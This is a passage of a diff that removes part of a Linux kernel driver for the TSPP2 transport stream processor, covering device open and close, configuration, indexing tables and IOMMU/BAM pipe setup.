--	if ((src->input == TSPP2_INPUT_TSIF0) ||
--		(src->input == TSPP2_INPUT_TSIF1)) {
--		reg = readl_relaxed(src->device->base +
--			TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
--		reg &= ~(0x1 << TSIF_INPUT_SRC_CONFIG_INPUT_EN_OFFS);
--		writel_relaxed(reg, src->device->base +
--			TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
--
--		tspp2_tsif_stop(&src->device->tsif_devices[src->input]);
--	} else {
--		reg = readl_relaxed(src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--		reg &= ~(0x1 << MEM_INPUT_SRC_CONFIG_INPUT_EN_OFFS);
--		writel_relaxed(reg, src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--	}
--
--	/*
--	 * HW requires we wait for up to 2ms here before closing the pipes
--	 * attached to (and used by) this source
--	 */
--	udelay(TSPP2_HW_DELAY_USEC);
--
--	src->enabled = 0;
--	src->device->num_enabled_sources--;
--
--	if (src->device->num_enabled_sources == 0) {
--		__pm_relax(&src->device->wakeup_src);
--		tspp2_clock_stop(src->device);
--	}
--
--	return 0;
--}
--
--/* TSPP2 device open / close API */
--
--/**
-- * tspp2_device_open() - Open a TSPP2 device for use.
-- *
-- * @dev_id:	TSPP2 device ID.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_device_open(u32 dev_id)
--{
--	int rc;
--	u32 reg = 0;
--	struct tspp2_device *device;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	if (mutex_lock_interruptible(&device->mutex))
--		return -ERESTARTSYS;
--
--	if (device->opened) {
--		pr_err("%s: Device already opened\n", __func__);
--		mutex_unlock(&device->mutex);
--		return -EPERM;
--	}
--
--	/* Enable power regulator */
--	rc = regulator_enable(device->gdsc);
--	if (rc)
--		goto err_mutex_unlock;
--
--	/* Reset TSPP2 core */
--	clk_reset(device->tspp2_core_clk, CLK_RESET_ASSERT);
--	udelay(10);
--	clk_reset(device->tspp2_core_clk, CLK_RESET_DEASSERT);
--
--	/* Start HW clocks before accessing registers */
--	rc = tspp2_reg_clock_start(device);
--	if (rc)
--		goto err_regulator_disable;
--
--	rc = tspp2_global_hw_reset(device, 1);
--	if (rc)
--		goto err_stop_clocks;
--
--	rc = tspp2_device_initialize(device);
--	if (rc)
--		goto err_stop_clocks;
--
--	reg = readl_relaxed(device->base + TSPP2_VERSION);
--	pr_info("TSPP2 HW Version: Major = %d, Minor = %d, Step = %d\n",
--		((reg & 0xF0000000) >> VERSION_MAJOR_OFFS),
--		((reg & 0x0FFF0000) >> VERSION_MINOR_OFFS),
--		((reg & 0x0000FFFF) >> VERSION_STEP_OFFS));
--
--	/* Stop HW clocks to save power */
--	tspp2_reg_clock_stop(device);
--
--	/* Enable runtime power management */
--	pm_runtime_set_autosuspend_delay(device->dev, MSEC_PER_SEC);
--	pm_runtime_use_autosuspend(device->dev);
--	pm_runtime_enable(device->dev);
--
--	device->opened = 1;
--
--	mutex_unlock(&device->mutex);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--err_stop_clocks:
--	tspp2_reg_clock_stop(device);
--err_regulator_disable:
--	regulator_disable(device->gdsc);
--err_mutex_unlock:
--	mutex_unlock(&device->mutex);
--
--	return rc;
--}
--EXPORT_SYMBOL(tspp2_device_open);
--
--/**
-- * tspp2_device_close() - Close a TSPP2 device.
-- *
-- * @dev_id:	TSPP2 device ID.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_device_close(u32 dev_id)
--{
--	int i;
--	int ret = 0;
--	struct tspp2_device *device;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	mutex_lock(&device->mutex);
--
--	if (!device->opened) {
--		pr_err("%s: Device already closed\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--	device->opened = 0;
--
--	/*
--	 * In case the user has not disabled all the enabled sources, we need
--	 * to disable them here, specifically in order to call tspp2_clock_stop,
--	 * because the calls to enable and disable the clocks should be
--	 * symmetrical (otherwise we cannot put the clocks).
--	 */
--	for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) {
--		if (device->tsif_sources[i].enabled)
--			tspp2_src_disable_internal(&device->tsif_sources[i]);
--	}
--	for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
--		if (device->mem_sources[i].enabled)
--			tspp2_src_disable_internal(&device->mem_sources[i]);
--	}
--
--	/* bring HW registers back to a known state */
--	tspp2_global_hw_reset(device, 0);
--
--	tspp2_device_uninitialize(device);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	/* Disable runtime power management */
--	pm_runtime_disable(device->dev);
--	pm_runtime_set_suspended(device->dev);
--
--	if (regulator_disable(device->gdsc))
--		pr_err("%s: Error disabling power regulator\n", __func__);
--
--	mutex_unlock(&device->mutex);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_device_close);
--
--/* Global configuration API */
--
--/**
-- * tspp2_config_set() - Set device global configuration.
-- *
-- * @dev_id:	TSPP2 device ID.
-- * @cfg:	TSPP2 global configuration parameters to set.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_config_set(u32 dev_id, const struct tspp2_config *cfg)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_device *device;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--	if (!cfg) {
--		pr_err("%s: NULL configuration\n", __func__);
--		return -EINVAL;
--	}
--	if (cfg->stc_byte_offset > 3) {
--		pr_err("%s: Invalid stc_byte_offset %d, valid values are 0 - 3\n",
--			__func__, cfg->stc_byte_offset);
--		return -EINVAL;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&device->mutex)) {
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--
--	if (cfg->pcr_on_discontinuity)
--		reg |= (0x1 << PCR_GLOBAL_CONFIG_PCR_ON_DISCONT_OFFS);
--
--	reg |= (cfg->stc_byte_offset << PCR_GLOBAL_CONFIG_STC_OFFSET_OFFS);
--	reg |= (cfg->min_pcr_interval << PCR_GLOBAL_CONFIG_PCR_INTERVAL_OFFS);
--
--	writel_relaxed(reg, device->base + TSPP2_PCR_GLOBAL_CONFIG);
--
--	mutex_unlock(&device->mutex);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_config_set);
--
--/**
-- * tspp2_config_get() - Get current global configuration.
-- *
-- * @dev_id:	TSPP2 device ID.
-- * @cfg:	TSPP2 global configuration parameters.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_config_get(u32 dev_id, struct tspp2_config *cfg)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_device *device;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--	if (!cfg) {
--		pr_err("%s: NULL configuration\n", __func__);
--		return -EINVAL;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&device->mutex)) {
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--
--	reg = readl_relaxed(device->base + TSPP2_PCR_GLOBAL_CONFIG);
--
--	cfg->pcr_on_discontinuity = ((reg & PCR_GLOBAL_CONFIG_PCR_ON_DISCONT) >>
--					PCR_GLOBAL_CONFIG_PCR_ON_DISCONT_OFFS);
--	cfg->stc_byte_offset = ((reg & PCR_GLOBAL_CONFIG_STC_OFFSET) >>
--					PCR_GLOBAL_CONFIG_STC_OFFSET_OFFS);
--	cfg->min_pcr_interval = ((reg & PCR_GLOBAL_CONFIG_PCR_INTERVAL) >>
--					PCR_GLOBAL_CONFIG_PCR_INTERVAL_OFFS);
--
--	mutex_unlock(&device->mutex);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_config_get);
--
--/* Indexing tables API functions */
--
--/**
-- * tspp2_indexing_prefix_set() - Set prefix value and mask of an indexing table.
-- *
-- * @dev_id:	TSPP2 device ID.
-- * @table_id:	Indexing table ID.
-- * @value:	Prefix 4-byte value.
-- * @mask:	Prefix 4-byte mask.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_indexing_prefix_set(u32 dev_id,
--				u8 table_id,
--				u32 value,
--				u32 mask)
--{
--	int ret;
--	u32 reg;
--	u8 size = 0;
--	int i;
--	struct tspp2_device *device;
--	struct tspp2_indexing_table *table;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--	if (table_id >= TSPP2_NUM_INDEXING_TABLES) {
--		pr_err("%s: Invalid table ID %d\n", __func__, table_id);
--		return -EINVAL;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&device->mutex)) {
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--
--	table = &device->indexing_tables[table_id];
--	table->prefix_value = value;
--	table->prefix_mask = mask;
--
--	/* HW expects values/masks to be written in Big Endian format */
--	writel_relaxed(cpu_to_be32(value),
--		device->base + TSPP2_INDEX_TABLE_PREFIX(table_id));
--	writel_relaxed(cpu_to_be32(mask),
--		device->base + TSPP2_INDEX_TABLE_PREFIX_MASK(table_id));
--
--	/* Find the actual size of the prefix and set to HW */
--	reg = readl_relaxed(device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--	for (i = 0; i < 32; i += 8) {
--		if (mask & (0x000000FF << i))
--			size++;
--	}
--	reg &= ~(0x7 << INDEX_TABLE_PARAMS_PREFIX_SIZE_OFFS);
--	reg |= (size << INDEX_TABLE_PARAMS_PREFIX_SIZE_OFFS);
--	writel_relaxed(reg, device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--
--	mutex_unlock(&device->mutex);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_indexing_prefix_set);
--
--/**
-- * tspp2_indexing_patterns_add() - Add patterns to an indexing table.
-- *
-- * @dev_id:		TSPP2 device ID.
-- * @table_id:		Indexing table ID.
-- * @values:		An array of 4-byte pattern values.
-- * @masks:		An array of corresponding 4-byte masks.
-- * @patterns_num:	Number of patterns in the values / masks arrays.
-- *			Up to TSPP2_NUM_INDEXING_PATTERNS.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_indexing_patterns_add(u32 dev_id,
--				u8 table_id,
--				const u32 *values,
--				const u32 *masks,
--				u8 patterns_num)
--{
--	int ret;
--	int i;
--	u16 offs = 0;
--	u32 reg;
--	struct tspp2_device *device;
--	struct tspp2_indexing_table *table;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--	if (table_id >= TSPP2_NUM_INDEXING_TABLES) {
--		pr_err("%s: Invalid table ID %d\n", __func__, table_id);
--		return -EINVAL;
--	}
--	if (!values || !masks) {
--		pr_err("%s: NULL values or masks array\n", __func__);
--		return -EINVAL;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&device->mutex)) {
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--
--	table = &device->indexing_tables[table_id];
--
--	if ((table->num_valid_entries + patterns_num) >
--			TSPP2_NUM_INDEXING_PATTERNS) {
--		pr_err("%s: Trying to add too many patterns: current number %d, trying to add %d, maximum allowed %d\n",
--			__func__, table->num_valid_entries, patterns_num,
--			TSPP2_NUM_INDEXING_PATTERNS);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EINVAL;
--	}
--
--	/* There's enough room to add all the requested patterns */
--	offs = table->num_valid_entries;
--	for (i = 0; i < patterns_num; i++) {
--		table->entry_value[offs + i] = values[i];
--		table->entry_mask[offs + i] = masks[i];
--		writel_relaxed(cpu_to_be32(values[i]),
--			device->base +
--				TSPP2_INDEX_TABLE_PATTEREN(table_id, offs + i));
--		writel_relaxed(cpu_to_be32(masks[i]), device->base +
--				TSPP2_INDEX_TABLE_MASK(table_id, offs + i));
--	}
--	table->num_valid_entries += patterns_num;
--	reg = readl_relaxed(device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--	reg &= ~(0x1F << INDEX_TABLE_PARAMS_NUM_PATTERNS_OFFS);
--	reg |= (table->num_valid_entries <<
--			INDEX_TABLE_PARAMS_NUM_PATTERNS_OFFS);
--	writel_relaxed(reg, device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--
--	mutex_unlock(&device->mutex);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_indexing_patterns_add);
--
--/**
-- * tspp2_indexing_patterns_clear() - Clear all patterns of an indexing table.
-- *
-- * @dev_id:	TSPP2 device ID.
-- * @table_id:	Indexing table ID.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_indexing_patterns_clear(u32 dev_id,
--				u8 table_id)
--{
--	int ret;
--	int i;
--	u32 reg;
--	struct tspp2_device *device;
--	struct tspp2_indexing_table *table;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--	if (table_id >= TSPP2_NUM_INDEXING_TABLES) {
--		pr_err("%s: Invalid table ID %d\n", __func__, table_id);
--		return -EINVAL;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&device->mutex)) {
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--
--	table = &device->indexing_tables[table_id];
--
--	for (i = 0; i < table->num_valid_entries; i++) {
--		table->entry_value[i] = 0;
--		table->entry_mask[i] = 0;
--		writel_relaxed(0, device->base +
--				TSPP2_INDEX_TABLE_PATTEREN(table_id, i));
--		writel_relaxed(0, device->base +
--				TSPP2_INDEX_TABLE_MASK(table_id, i));
--
--	}
--	table->num_valid_entries = 0;
--	reg = readl_relaxed(device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--	reg &= ~(0x1F << INDEX_TABLE_PARAMS_NUM_PATTERNS_OFFS);
--	writel_relaxed(reg, device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--
--	mutex_unlock(&device->mutex);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_indexing_patterns_clear);
--
--/* Pipe API functions */
--
--/**
-- * tspp2_pipe_memory_init() - Initialize pipe memory helper function.
-- *
-- * @pipe:	The pipe to work on.
-- *
-- * The user is responsible for allocating the pipe's memory buffer via ION.
-- * This helper function maps the given buffer to TSPP2 IOMMU memory space,
-- * and sets the pipe's secure bit.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_pipe_memory_init(struct tspp2_pipe *pipe)
--{
--	int ret = 0;
--	u32 reg;
--	size_t align;
--	unsigned long dummy_size = 0;
--	size_t len = 0;
--	int domain = 0;
--	int partition = 0;
--	int hlos_group_attached = 0;
--	int cpz_group_attached = 0;
--	int vbif_clk_started = 0;
--
--	if (pipe->cfg.is_secure) {
--		domain = pipe->device->iommu_info.cpz_domain_num;
--		partition = pipe->device->iommu_info.cpz_partition;
--		align = SZ_1M;
--	} else {
--		domain = pipe->device->iommu_info.hlos_domain_num;
--		partition = pipe->device->iommu_info.hlos_partition;
--		align = SZ_4K;
--	}
--
--	if (tspp2_iommu_bypass) {
--		ret = ion_phys(pipe->cfg.ion_client,
--				pipe->cfg.buffer_handle, &pipe->iova, &len);
--
--		dummy_size = 0;
--
--		if (ret) {
--			pr_err("%s: Failed to get buffer physical address, ret = %d\n",
--				__func__, ret);
--			return ret;
--		}
--
--		if ((pipe->device->num_secured_opened_pipes +
--			pipe->device->num_non_secured_opened_pipes) == 0) {
--			ret = tspp2_vbif_clock_start(pipe->device);
--			if (ret) {
--				pr_err(
--					"%s: tspp2_vbif_clock_start failed, ret=%d\n",
--					__func__, ret);
--				return ret;
--			}
--			vbif_clk_started = 1;
--		}
--	} else {
--		/*
--		 * We need to attach the group to enable the IOMMU and support
--		 * the required memory mapping. This needs to be done before
--		 * the first mapping is performed, so the number of opened pipes
--		 * (of each type: secure or non-secure) is used as a
--		 * reference count. Note that since the pipe descriptors are
--		 * always allocated from HLOS domain, the HLOS group must be
--		 * attached regardless of the pipe's security configuration.
--		 * The mutex is taken at this point so there is no problem with
--		 * synchronization.
--		 */
--		if ((pipe->device->num_secured_opened_pipes +
--			pipe->device->num_non_secured_opened_pipes) == 0) {
--			ret = tspp2_vbif_clock_start(pipe->device);
--			if (ret) {
--				pr_err("%s: tspp2_vbif_clock_start failed, ret=%d\n",
--					__func__, ret);
--				goto err_out;
--			}
--			vbif_clk_started = 1;
--
--			pr_debug("%s: attaching HLOS group\n", __func__);
--			ret = iommu_attach_group(
--				pipe->device->iommu_info.hlos_domain,
--				pipe->device->iommu_info.hlos_group);
--
--			if (ret) {
--				pr_err("%s: Failed attaching IOMMU HLOS group, %d\n",
--					__func__, ret);
--				goto err_out;
--			}
--			hlos_group_attached = 1;
--		}
--
--		if (pipe->cfg.is_secure &&
--			(pipe->device->num_secured_opened_pipes == 0)) {
--			pr_debug("%s: attaching CPZ group\n", __func__);
--			ret = iommu_attach_group(
--				pipe->device->iommu_info.cpz_domain,
--				pipe->device->iommu_info.cpz_group);
--
--			if (ret) {
--				pr_err("%s: Failed attaching IOMMU CPZ group, %d\n",
--					__func__, ret);
--				goto err_out;
--			}
--			cpz_group_attached = 1;
--		}
--
--		/* Map to TSPP2 IOMMU */
--		ret = ion_map_iommu(pipe->cfg.ion_client,
--				pipe->cfg.buffer_handle,
--				domain,
--				partition,
--				align, 0, &pipe->iova,
--				&dummy_size, 0, 0); /* Uncached mapping */
--
--		if (ret) {
--			pr_err("%s: Failed mapping buffer to TSPP2, %d\n",
--				__func__, ret);
--			goto err_out;
--		}
--	}
--
--	if (pipe->cfg.is_secure) {
--		reg = readl_relaxed(pipe->device->base + TSPP2_PIPE_SECURITY);
--		reg |= (0x1 << pipe->hw_index);
--		writel_relaxed(reg, pipe->device->base + TSPP2_PIPE_SECURITY);
--	}
--
--	dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--err_out:
--	if (hlos_group_attached) {
--		iommu_detach_group(pipe->device->iommu_info.hlos_domain,
--				pipe->device->iommu_info.hlos_group);
--	}
--
--	if (cpz_group_attached) {
--		iommu_detach_group(pipe->device->iommu_info.cpz_domain,
--				pipe->device->iommu_info.cpz_group);
--	}
--
--	if (vbif_clk_started)
--		tspp2_vbif_clock_stop(pipe->device);
--
--	return ret;
--}
--
--/**
-- * tspp2_pipe_memory_terminate() - Unmap pipe memory.
-- *
-- * @pipe:	The pipe to work on.
-- *
-- * Unmap the pipe's memory and clear the pipe's secure bit.
-- */
--static void tspp2_pipe_memory_terminate(struct tspp2_pipe *pipe)
--{
--	u32 reg;
--	int domain = 0;
--	int partition = 0;
--
--	if (pipe->cfg.is_secure) {
--		domain = pipe->device->iommu_info.cpz_domain_num;
--		partition = pipe->device->iommu_info.cpz_partition;
--	} else {
--		domain = pipe->device->iommu_info.hlos_domain_num;
--		partition = pipe->device->iommu_info.hlos_partition;
--	}
--
--	if (!tspp2_iommu_bypass) {
--		ion_unmap_iommu(pipe->cfg.ion_client,
--				pipe->cfg.buffer_handle,
--				domain,
--				partition);
--
--		/*
--		 * Opposite to what is done in tspp2_pipe_memory_init(),
--		 * here we detach the IOMMU group when it is no longer in use.
--		 */
--		if (pipe->cfg.is_secure &&
--			(pipe->device->num_secured_opened_pipes == 0)) {
--			pr_debug("%s: detaching CPZ group\n", __func__);
--			iommu_detach_group(
--				pipe->device->iommu_info.cpz_domain,
--				pipe->device->iommu_info.cpz_group);
--		}
--
--		if ((pipe->device->num_secured_opened_pipes +
--			pipe->device->num_non_secured_opened_pipes) == 0) {
--			pr_debug("%s: detaching HLOS group\n", __func__);
--			iommu_detach_group(
--				pipe->device->iommu_info.hlos_domain,
--				pipe->device->iommu_info.hlos_group);
--			tspp2_vbif_clock_stop(pipe->device);
--		}
--	} else if ((pipe->device->num_secured_opened_pipes +
--		pipe->device->num_non_secured_opened_pipes) == 0) {
--		tspp2_vbif_clock_stop(pipe->device);
--	}
--
--	pipe->iova = 0;
--
--	if (pipe->cfg.is_secure) {
--		reg = readl_relaxed(pipe->device->base + TSPP2_PIPE_SECURITY);
--		reg &= ~(0x1 << pipe->hw_index);
--		writel_relaxed(reg, pipe->device->base + TSPP2_PIPE_SECURITY);
--	}
--
--	dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--}
--
--/**
-- * tspp2_sps_pipe_init() - BAM SPS pipe configuration and initialization
-- *
-- * @pipe:	The pipe to work on.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_sps_pipe_init(struct tspp2_pipe *pipe)
--{
--	u32 descriptors_num;
--	unsigned long dummy_size = 0;
--	int ret = 0;
--	int iommu_mapped = 0;
--
--	if (pipe->cfg.buffer_size % pipe->cfg.sps_cfg.descriptor_size) {
--		pr_err(
--			"%s: Buffer size %d is not aligned to descriptor size %d\n",
--			__func__, pipe->cfg.buffer_size,
--			pipe->cfg.sps_cfg.descriptor_size);
--		return -EINVAL;
--	}
--
--	pipe->sps_pipe = sps_alloc_endpoint();
--	if (!pipe->sps_pipe) {
--		pr_err("%s: Failed to allocate BAM pipe\n", __func__);
--		return -ENOMEM;
--	}
--
--	/* get default configuration */
--	sps_get_config(pipe->sps_pipe, &pipe->sps_connect_cfg);
--	if (pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_INPUT) {
--		pipe->sps_connect_cfg.mode = SPS_MODE_DEST;
--		pipe->sps_connect_cfg.source = SPS_DEV_HANDLE_MEM;
--		pipe->sps_connect_cfg.destination = pipe->device->bam_handle;
--		pipe->sps_connect_cfg.dest_pipe_index = pipe->hw_index;
--	} else {
--		pipe->sps_connect_cfg.mode = SPS_MODE_SRC;
--		pipe->sps_connect_cfg.source = pipe->device->bam_handle;
--		pipe->sps_connect_cfg.destination = SPS_DEV_HANDLE_MEM;
--		pipe->sps_connect_cfg.src_pipe_index = pipe->hw_index;
--	}
--	pipe->sps_connect_cfg.desc.base = NULL;
--	pipe->sps_connect_cfg.options = pipe->cfg.sps_cfg.setting;
--	descriptors_num = (pipe->cfg.buffer_size /
--				pipe->cfg.sps_cfg.descriptor_size);
--
--	/*
--	 * If size of descriptors FIFO can hold N descriptors, we can submit
--	 * (N-1) descriptors only, therefore we allocate extra descriptor
--	 */
--	descriptors_num++;
--	pipe->sps_connect_cfg.desc.size = (descriptors_num *
--					sizeof(struct sps_iovec));
--
--	if (tspp2_iommu_bypass) {
--		pipe->sps_connect_cfg.desc.base = dma_alloc_coherent(NULL,
--					pipe->sps_connect_cfg.desc.size,
--					&pipe->sps_connect_cfg.desc.phys_base,
--					GFP_KERNEL);
--
--		if (!pipe->sps_connect_cfg.desc.base) {
--			pr_err("%s: Failed to allocate descriptor FIFO\n",
--				__func__);
--			ret = -ENOMEM;
--			goto init_sps_failed_free_endpoint;
--		}
--	} else {
--		pipe->desc_ion_handle = ion_alloc(pipe->cfg.ion_client,
--					pipe->sps_connect_cfg.desc.size,
--					SZ_4K, ION_HEAP(ION_IOMMU_HEAP_ID), 0);
--
--		if (!pipe->desc_ion_handle) {
--			pr_err("%s: Failed to allocate descriptors via ION\n",
--				__func__);
--			ret = -ENOMEM;
--			goto init_sps_failed_free_endpoint;
--		}
--
--		ret = ion_map_iommu(pipe->cfg.ion_client,
--			pipe->desc_ion_handle,
--			pipe->device->iommu_info.hlos_domain_num,
--			pipe->device->iommu_info.hlos_partition,
--			SZ_4K, 0,
--			&pipe->sps_connect_cfg.desc.phys_base,
--			&dummy_size, 0, 0); /* Uncached mapping */
--
--		if (ret) {
--			pr_err("%s: Failed mapping descriptors to IOMMU\n",
--				__func__);
--			goto init_sps_failed_free_mem;
--		}
--
--		iommu_mapped = 1;
--
--		pipe->sps_connect_cfg.desc.base =
--			ion_map_kernel(pipe->cfg.ion_client,
--			pipe->desc_ion_handle);
--
--		if (!pipe->sps_connect_cfg.desc.base) {
--			pr_err("%s: Failed mapping descriptors to kernel\n",
--				__func__);
--			ret = -ENOMEM;
--			goto init_sps_failed_free_mem;
--		}
--	}
--
--	ret = sps_connect(pipe->sps_pipe, &pipe->sps_connect_cfg);
--	if (ret) {
--		pr_err("%s: Failed to connect BAM, %d\n", __func__, ret);
--		goto init_sps_failed_free_mem;
--	}
--
--	pipe->sps_event.options = pipe->cfg.sps_cfg.wakeup_events;
--	if (pipe->sps_event.options) {
--		pipe->sps_event.mode = SPS_TRIGGER_CALLBACK;
--		pipe->sps_event.callback = pipe->cfg.sps_cfg.callback;
--		pipe->sps_event.xfer_done = NULL;
--		pipe->sps_event.user = pipe->cfg.sps_cfg.user_info;
--
--		ret = sps_register_event(pipe->sps_pipe, &pipe->sps_event);
--		if (ret) {
--			pr_err("%s: Failed to register pipe event, %d\n",
--					__func__, ret);
--			goto init_sps_failed_free_connection;
--		}
--	}
--
--	dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--init_sps_failed_free_connection:
--	sps_disconnect(pipe->sps_pipe);
--init_sps_failed_free_mem:
--	if (tspp2_iommu_bypass) {
--		dma_free_coherent(NULL, pipe->sps_connect_cfg.desc.size,
--					pipe->sps_connect_cfg.desc.base,
--					pipe->sps_connect_cfg.desc.phys_base);
--	} else {
--		if (pipe->sps_connect_cfg.desc.base)
--			ion_unmap_kernel(pipe->cfg.ion_client,
--				pipe->desc_ion_handle);
--
--		if (iommu_mapped) {
--			ion_unmap_iommu(pipe->cfg.ion_client,
--				pipe->desc_ion_handle,
--				pipe->device->iommu_info.hlos_domain_num,
--				pipe->device->iommu_info.hlos_partition);
--		}
